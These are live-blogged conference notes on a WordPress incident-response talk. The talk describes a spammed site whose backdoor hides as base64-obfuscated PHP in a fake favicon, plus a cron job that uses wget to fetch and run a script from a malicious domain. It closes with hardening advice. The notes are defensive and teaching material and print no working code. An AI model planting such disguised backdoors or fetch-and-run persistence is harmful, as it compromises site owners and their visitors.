Nestor Angulo de Ugarte: The strange case of malicious Favicons [WCGVA 2022]

Live-blogging notes, may contain errors! WordCamp Geneva 2022

A story about being hacked. Clean-up team (blue team).

A few concepts to get on the same page.

Two types of companies, those who have been hacked, and those who don’t yet know they have been hacked.

Hackers (curious person who likes to go beyond limits or conventions) vs. cyberterrorists (computer hacker, aligned to enrich himself in a zero-sum game situation = the bad guy).

How a WP site is infected: there is a vulnerability, somebody discovers it and creates and exploit, injects it (final code; backdoor = worse scenario). => spam, botnode, etc.

Targets: users, database, content, infrastructure, bot net, reputation.

Some facts:

  • site hacking is almost never client-oriented (98%)

What measures do we have for infected sites?

  • reactive (incident response), when something bad has always happened — pain mitigation

In this case: incident response. Identifying an attack quickly, minimising effects, containing damage… We’ll see how Nestor discovered what hat happened and what he did.

Wordpress install in which we can see a few weirdly named folders and a file zzkwjuce.zip. Scenario: spammed site. SEO affected, removed Google Rank 😱, rapid reinfection. Viagra ads on site. Then you get warnings on the site… not fun.

Facts:

  • no WAF (web application firewall) for this website

=> index.php, contains an @include to a weird favicon somewhere in a theme. Uses “$ php -a” and unphp. It’s base64 code. base64decode.org Runtime semphore.

Actually the real backdoor was in the comments of the PHP code.

ctrlq.org/beautifier can be useful to make things readable. Sitecheck.sucuri.net (slide with various useful tools).

webpagetest

The favicon was in fact a backdoor to connect to a remote server => turning the website into a bot node. 0day ability. Different options included (spam e.g.), tracking of infected sites, bot net dashboard…

Main question: how does reinfection happen? via a cron job in a user directory (wget), get a file from a malicious domain, make it executable, run the sh script, and there we go.

Final advice: install proactive measures!

  • reduce admins, plugins, and themes (least privilege rule)

Invest in hosting AND security.

WAF: can be external or internal. Wordfence has a WAF. Analyses traffic. Internal can use up ressources. With an external one, the traffic has to pass through it. Sounds like the Star Trek transporter decontamination.

Originally published at Climb to the Stars.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Stephanie Booth

Anglo-Swiss. Digital communications and strategy. Lausanne. Feline Diabetes. Other random stuff.